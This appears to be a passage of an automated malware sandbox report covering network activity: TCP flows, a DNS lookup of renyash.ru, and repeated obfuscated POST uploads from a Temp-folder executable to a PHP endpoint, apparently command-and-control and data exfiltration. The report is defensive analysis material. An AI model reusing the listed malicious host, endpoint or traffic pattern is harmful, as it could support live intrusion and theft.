Dec 17, 2024 00:09:09.520697117 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.520837069 CET	49958	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.520852089 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.521086931 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.641360044 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:09.867181063 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:09.987407923 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:10.613881111 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:10.663703918 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:10.855220079 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:10.898081064 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.046778917 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:11.051852942 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.172296047 CET	80	49964	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:11.172380924 CET	49964	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.185414076 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.305814028 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:11.306020021 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.306108952 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.426220894 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:11.663836002 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:11.978326082 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.175051928 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.175101995 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.392462015 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.446657896 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.653157949 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.695025921 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.842328072 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.842927933 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.963058949 CET	80	49970	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.963265896 CET	49970	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.963598967 CET	80	49972	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:12.963706970 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:12.963829041 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:13.083858967 CET	80	49972	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:13.320231915 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:13.440504074 CET	80	49972	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.061630964 CET	80	49972	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.116971016 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.117903948 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.118696928 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.238049984 CET	80	49972	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.238603115 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.238708973 CET	49972	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.240637064 CET	49978	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.240751982 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.240751982 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.361238003 CET	80	49978	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.361282110 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.361531973 CET	49978	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.361531973 CET	49978	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.481488943 CET	80	49978	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.585773945 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:14.705910921 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:14.706094027 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:15.328808069 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:15.382461071 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:15.447830915 CET	80	49978	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:15.491853952 CET	49978	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:15.561702967 CET	80	49977	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:15.601306915 CET	49977	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:22.452569008 CET	49978	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:09:22.572947979 CET	80	49978	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:23.020773888 CET	80	49978	104.21.38.84	192.168.2.4
Dec 17, 2024 00:09:23.069997072 CET	49978	80	192.168.2.4	104.21.38.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 00:07:47.298847914 CET	56676	53	192.168.2.4	1.1.1.1
Dec 17, 2024 00:07:47.744263887 CET	53	56676	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 00:07:47.298847914 CET	192.168.2.4	1.1.1.1	0x1288	Standard query (0)	749858cm.renyash.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 00:07:30.507862091 CET	1.1.1.1	192.168.2.4	0x3433	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 00:07:30.507862091 CET	1.1.1.1	192.168.2.4	0x3433	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 17, 2024 00:07:47.744263887 CET	1.1.1.1	192.168.2.4	0x1288	No error (0)	749858cm.renyash.ru		104.21.38.84	A (IP address)	IN (0x0001)	false
Dec 17, 2024 00:07:47.744263887 CET	1.1.1.1	192.168.2.4	0x1288	No error (0)	749858cm.renyash.ru		172.67.220.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

749858cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:47.870167017 CET	289	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:07:48.227233887 CET	344	OUT	Data Raw: 00 0b 04 0d 03 0c 01 03 05 06 02 01 02 07 01 00 00 05 05 0a 02 02 03 0f 07 04 0c 05 03 0f 06 01 0e 04 03 0c 02 56 04 05 0d 02 06 03 04 01 05 01 03 05 0d 0f 0f 57 07 0a 06 50 04 56 07 52 06 0a 02 00 0a 0f 00 00 06 06 0b 03 0f 03 0a 05 0f 05 04 0d Data Ascii: VWPVRU\L}TksvNvrz]bukQ\|oeLv\|lB]`KxRQ{N[_mcScdo]u~V@AxCnO~\S
Dec 17, 2024 00:07:48.959978104 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:49.247869968 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilm7OZ2IG4mPgk9Dtb5V7ywCGCH5hXAb%2BdY2yDSDqdQ%2FE1lYA8jqomfUtFByt0H%2FORcgtzUNwUDiVb4bBytA%2BvvCqytz%2FsMqw5mvM6Vb%2BpD62xkbf0UJwFjUpiboZ0ocbynZMOP%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3254ee0f4c42a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5129&min_rtt=2064&rtt_var=6904&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=633&delivery_rate=54920&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 38 0d 0a 56 4a 7e 06 6f 7d 7f 01 6c 71 78 05 7c 4f 60 5b 7d 49 5a 55 7c 73 6a 50 79 4d 74 42 7e 5c 51 59 63 60 7d 09 79 58 65 4b 77 76 55 5a 7e 71 78 01 55 4b 71 40 77 5b 7c 58 7d 72 5c 5d 7c 77 6a 0b 7b 48 6b 55 7e 5d 5e 5b 61 5b 75 41 60 61 61 49 7c 62 7d 5a 7d 0a 73 52 7d 49 55 01 76 5c 7b 06 7c 5c 75 03 7e 06 72 5b 6f 49 60 4c 79 67 74 05 7b 54 7f 04 6d 5c 5d 5a 78 5d 7e 03 7f 63 68 02 6f 59 67 5b 7d 5b 70 5b 75 07 7c 02 7a 51 41 5b 7c 77 55 51 7c 07 62 50 61 52 70 02 6c 6c 7c 4b 74 70 71 52 79 4f 6d 00 7e 42 71 5e 7a 71 72 02 76 60 67 01 61 4f 7c 03 74 5f 66 50 7e 5d 79 5f 77 62 6e 5c 76 66 60 09 7f 42 65 01 77 6f 74 04 7e 70 7c 07 78 6f 6c 5a 6c 60 65 5a 6b 6d 78 08 77 74 7c 05 7e 61 72 09 6a 6d 63 41 6f 6e 66 04 6a 72 58 5f 7b 5d 46 51 6b 52 78 09 7f 63 74 42 69 64 62 4e 78 54 64 5a 78 62 5a 46 68 4f 5e 5f 7c 77 73 0c 7c 4e 65 40 79 70 74 04 7e 62 67 5a 60 4d 71 51 7b 5c 79 07 75 76 5a 4a 7d 66 70 06 7f 76 5f 08 76 62 7b 49 7c 5c 53 05 7c 59 62 0b 78 66 7c 0b 7e 63 55 03 75 72 71 06 76 [TRUNCATED] Data Ascii: 548VJ~o}lqx\|O`[}IZU\|sjPyMtB~\QYc`}yXeKwvUZ~qxUKq@w[\|X}r\]\|wj{HkU~]^[a[uA`aaI\|b}Z}sR}IUv\{\|\u~r[oI`Lygt{Tm\]Zx]~choYg[}[p[u\|zQA[\|wUQ\|bPaRpll\|KtpqRyOm~Bq^zqrv`gaO\|t_fP~]y_wbn\vf`Bewot~p\|xolZl`eZkmxwt\|~arjmcAonfjrX_{]FQkRxctBidbNxTdZxbZFhO^_\|ws\|Ne@ypt~bgZ`MqQ{\yuvZJ}fpv_vb{I\|\S\|Ybxf\|~cUurqvqy~az}Rl}wgJu_{r_I\|`i{w`{whMymczLdxcf\|`^yg`~Lo@ualH~BU}gp@}qSuBlLxBtw`nz_eJ}\|~N{_TKvM{Jw
Dec 17, 2024 00:07:49.247932911 CET	922	IN	Data Raw: 61 64 02 77 71 72 09 7f 5e 50 40 74 62 71 4c 77 65 78 0a 7f 42 69 4c 76 7c 5a 07 7f 4d 70 06 7b 6c 5d 02 7b 5e 66 44 7c 6d 7c 4e 77 49 70 07 7d 4c 7e 42 7c 6d 5d 40 78 7d 50 41 7e 62 69 40 7c 4e 78 08 7f 42 7c 0d 7e 70 74 0c 7e 59 7a 07 78 6d 7f Data Ascii: adwqr^P@tbqLwexBiLv\|ZMp{l]{^fD\|m\|NwIp}L~B\|m]@x}PA~bi@\|NxB\|~pt~YzxmIx\hK\|qcJ}Ic@\|NWOzc^~blHtcezqquHx~X\|~fS@w\Y\|\WYPyfx~swu\_wa}J_bF}l\|~gcua{bm~p_xIlMygZL{}FzLRxcv{]NZxto^ibxZwbd}\|xYkgt\|OywltloxFcc~yXaG
Dec 17, 2024 00:07:49.607323885 CET	265	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 384 Expect: 100-continue
Dec 17, 2024 00:07:49.921751022 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:49.922660112 CET	384	OUT	Data Raw: 5d 52 43 52 59 5c 54 5d 5d 5a 59 53 57 5a 5a 55 5a 51 5f 58 51 52 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCRY\T]]ZYSWZZUZQ_XQRRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ^)/S)'0 _%='Z"(]._?;W$2-=.9 Q?X)"F"#Y
Dec 17, 2024 00:07:50.398080111 CET	954	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c6OlJNJdTA4wWhnS8DoOZmBssi%2F96WZ9QNRvXmAcmuHKqiBPMUMSKJMwJple6faZO5MV6F0gvIRQukRSPgeT10XvsOTL4mCev7UKSbD7obDACyB7kVXcsuz6F%2FaUtJaaqSMf%2BHdF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3254f40fc042a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6342&min_rtt=1687&rtt_var=7789&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2208&recv_bytes=1282&delivery_rate=2502857&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 0e 30 2d 2e 58 37 3d 27 53 2b 3c 30 10 27 1d 29 5c 2c 59 2f 18 26 23 25 00 25 21 21 5f 31 34 2f 14 34 0f 0d 0d 27 31 06 1e 25 1d 23 5d 01 1b 24 1b 24 2e 31 01 29 3f 08 5c 33 30 00 0a 24 3d 37 08 26 1a 02 1c 32 33 24 0a 35 06 35 04 2f 31 3e 11 3c 2f 23 58 2d 0e 21 5c 37 14 21 52 0d 13 21 09 33 28 32 5b 24 08 23 11 34 30 27 59 21 1a 05 53 30 3f 24 0c 25 39 24 5c 24 2c 3a 5a 26 5e 3f 1b 2a 28 26 1f 20 31 23 0f 3c 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:0-.X7='S+<0')\,Y/&#%%!!_14/4'1%#]$$.1)?\30$=7&23$55/1></#X-!\7!R!3(2[$#40'Y!S0?$%9$\$,:Z&^?*(& 1#< R, P5TS0
Dec 17, 2024 00:07:50.746809006 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1728 Expect: 100-continue
Dec 17, 2024 00:07:51.062060118 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:51.080518961 CET	1728	OUT	Data Raw: 5d 51 43 52 59 5a 54 52 5d 5a 59 53 57 5d 5a 53 5a 52 5f 59 51 5d 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QCRYZTR]ZYSW]ZSZR_YQ]RH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _+Y6W>=3\'#''=$":<.8(+01:=:4,(("F"#Y <
Dec 17, 2024 00:07:51.555958033 CET	958	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nLNfbzn1SO%2BAFJSWrHNcamSKyKcbuGdVkQS1yQ56i4jSsrzwTRH2QSFdaLMroen9l7LdpuuhBilTDH4Ua%2FzXeQy5HBAoCqhSad4jigTFVbZvRDjK1D1PjKCY5aE%2Foe6hy%2B4NBrI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3254fb289442a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7385&min_rtt=1661&rtt_var=8490&sent=12&recv=13&lost=0&retrans=0&sent_bytes=3187&recv_bytes=3276&delivery_rate=2502857&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 1f 30 04 36 5b 37 58 27 14 3e 06 27 0e 27 30 29 5f 2f 3f 0a 41 31 20 22 58 32 21 36 02 25 1a 05 17 20 32 33 09 33 1f 02 54 32 0d 23 5d 01 1b 24 1a 30 3d 3a 5f 3f 3f 3a 5d 24 0e 0b 18 31 2e 11 40 31 1d 20 1e 32 0d 0d 54 21 01 3e 11 2c 22 3d 01 3c 2f 2b 15 39 23 3e 03 20 3e 21 52 0d 13 22 54 30 38 2e 5b 24 0f 15 59 20 23 01 5d 22 34 34 08 24 2c 09 50 31 2a 20 58 25 2f 0c 12 25 06 2b 1b 3d 01 39 0a 37 22 34 1f 28 14 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98906[7X'>''0)_/?A1 "X2!6% 233T2#]$0=:_??:]$1.@1 2T!>,"=</+9#> >!R"T08.[$Y #]"44$,P1* X%/%+=97"4( R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:50.871164083 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:07:51.226147890 CET	1060	OUT	Data Raw: 58 57 43 53 59 59 51 5f 5d 5a 59 53 57 5f 5a 57 5a 5f 5f 54 51 53 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XWCSYYQ_]ZYSW_ZWZ__TQSRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y<==[0$ 3+]4 -?^?$1:U*7'="F"#Y 4
Dec 17, 2024 00:07:51.959036112 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:52.204278946 CET	804	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gom26Nr6O6qLSlFXgXDYMZ6mHDCiZczyBNvUeI8C7Qk9q48V6PAP5ccC%2FOfFe%2FBN0CSkULLbmjqmQ6fl%2BQ5oSuyYgbHzQbBDtFsSMQqzmlKLVJI6VZ5sRT3w9o1PU9PNlX%2BzxMpX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325500bb5dc34f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3141&min_rtt=1617&rtt_var=3655&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=105705&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:52.788435936 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:07:53.141554117 CET	1060	OUT	Data Raw: 58 5b 43 52 59 50 51 5f 5d 5a 59 53 57 59 5a 52 5a 51 5f 5d 51 5c 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: X[CRYPQ_]ZYSWYZRZQ_]Q\RC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+!?-\38^$7^ 3.97]<+ %S*>:47,>"F"#Y ,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:53.540923119 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1056 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:07:53.945245981 CET	1056	OUT	Data Raw: 58 56 46 56 59 5b 54 58 5d 5a 59 53 57 5b 5a 51 5a 51 5f 59 51 5f 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XVFVY[TX]ZYSW[ZQZQ_YQ_RD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#<5?=;$$'Z #,98++1!2W*X9]7']="F"#Y <
Dec 17, 2024 00:07:54.602454901 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:54.850791931 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmgL9JXB1bJ0ynPvoonX9zbdTgbtinm9WBPMLSIxaY2tPdjLpQm9T%2BuZvbrBibBvIpDKLWfXfaXG%2FG7E9YilLrkCd86S2Z7%2FJtMwV0S2za6oH82eLbrkzKw0QPIxBUwVdW1DK4iH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255114e9b5e66-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4674&min_rtt=1837&rtt_var=6363&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=59506&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:55.196358919 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:55.577184916 CET	292	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 130776 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:07:55.929527044 CET	12360	OUT	Data Raw: 58 50 43 52 59 51 54 5a 5d 5a 59 53 57 53 5a 5f 5a 51 5f 58 51 53 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XPCRYQTZ]ZYSWSZ_ZQ_XQSRD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y(?*>.0'8Y''[#8. +;P%19(. )8"F"#Y
